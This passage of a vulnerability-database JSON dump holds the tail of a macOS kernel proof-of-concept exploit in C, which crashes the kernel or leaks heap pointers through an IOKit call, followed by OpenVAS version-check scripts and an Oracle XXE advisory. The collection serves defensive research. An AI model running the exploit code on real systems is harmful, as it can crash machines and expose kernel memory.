IOServiceOpen(service, mach_task_self(), 0, &conn);\r\n if (err != KERN_SUCCESS){\r\n printf(\"unable to get user client connection\\n\");\r\n return 0;\r\n }\r\n\r\n uint64_t inputScalar[16]; \r\n uint64_t inputScalarCnt = 0;\r\n\r\n char inputStruct[4096];\r\n size_t inputStructCnt = 8;\r\n *(uint64_t*)inputStruct = 0x12345678; // crash\r\n //*(uint64_t*)inputStruct = 0x37; // disclose kernel heap memory\r\n\r\n\r\n uint64_t outputScalar[16];\r\n uint32_t outputScalarCnt = 0;\r\n\r\n char outputStruct[4096];\r\n size_t outputStructCnt = 4096;\r\n \r\n err = IOConnectCallMethod(\r\n conn,\r\n 0x710,\r\n inputScalar,\r\n inputScalarCnt,\r\n inputStruct,\r\n inputStructCnt,\r\n outputScalar,\r\n &outputScalarCnt,\r\n outputStruct,\r\n &outputStructCnt); \r\n\r\n if (outputStructCnt > 20) {\r\n int n_leaked_ptrs = (outputStructCnt-7)/8;\r\n uint64_t* ptrs = (uint64_t*) (outputStruct+7);\r\n for (int i = 0; i < n_leaked_ptrs; i++) {\r\n printf(\"%016llx\\n\", ptrs[i]);\r\n }\r\n }\r\n return 0;\r\n}", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/43780/"}], "openvas": [{"lastseen": "2019-07-17T14:22:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5754", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13858", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13876", "CVE-2017-7163", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-13848", "CVE-2017-13875"], "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENVAS:1361412562310812400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812400", "type": "openvas", "title": "Apple MacOSX Security Updates(HT208331, HT208394)-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple MacOSX Security Updates(HT208331, HT208394)-01\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812400\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-13872\", \"CVE-2017-5754\", \"CVE-2017-13860\", \"CVE-2017-13871\",\n \"CVE-2017-13865\", \"CVE-2017-13876\", \"CVE-2017-13848\", \"CVE-2017-13858\",\n \"CVE-2017-13875\", \"CVE-2017-13878\", \"CVE-2017-13883\", \"CVE-2017-7163\",\n \"CVE-2017-7155\", \"CVE-2017-7171\");\n script_bugtraq_id(101981, 102378, 102097, 102099, 102100);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:33 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331, HT208394)-01\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update resolves, a logic error\n existed in the validation of credentials, an encryption issue existed with S/MIME\n credentials, an inconsistent user interface issue and an error in systems with\n microprocessors utilizing speculative execution, memory corruption issue,\n input validation issue existed in the kernel, an out-of-bounds read error and\n indirect branch prediction.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code with kernel and system privileges. Also\n attacker may be able to bypass administrator authentication without supplying\n the administrator's password and also allow unauthorized disclosure of\n information to an attacker with local user access via a side-channel analysis\n of the data cache and can cause unexpected system termination.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions, 10.13.x through 10.13.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X 10.13.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208394\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.13\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.13\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nif(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.1\"))\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.13.2\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:22:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13871", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13858", "CVE-2017-13878", "CVE-2017-13876", "CVE-2017-13883", "CVE-2017-13848", "CVE-2017-13875"], "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENVAS:1361412562310812408", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812408", "type": "openvas", "title": "Apple MacOSX Security Updates(HT208331)-04", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple MacOSX Security Updates(HT208331)-04\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812408\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-13876\", \"CVE-2017-13875\", \"CVE-2017-13871\", \"CVE-2017-13860\",\n\t\t\"CVE-2017-13883\", \"CVE-2017-13848\", \"CVE-2017-13858\", \"CVE-2017-13878\",\n\t \"CVE-2017-13865\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:33 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331)-04\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update resolves,\n\n - A memory corruption issue was addressed with improved memory handling.\n\n - An out-of-bounds read was addressed through improved bounds checking.\n\n - A logic error existed in the validation of credentials.\n\n - An inconsistent user interface issue was addressed with improved state management.\n\n - An input validation issue existed in the kernel.\n\n - An out-of-bounds read issue existed that led to the disclosure of kernel memory.\n\n - A validation issue was addressed with improved input sanitization.\n\n - An encryption issue existed with S/MIME credentials.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code with kernel and system privileges. Also\n attacker may be able to bypass administrator authentication without supplying\n the administrator's password.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.13.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X 10.13.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.13\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.13\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nif(osVer == \"10.13.1\")\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.13.2\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4851"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
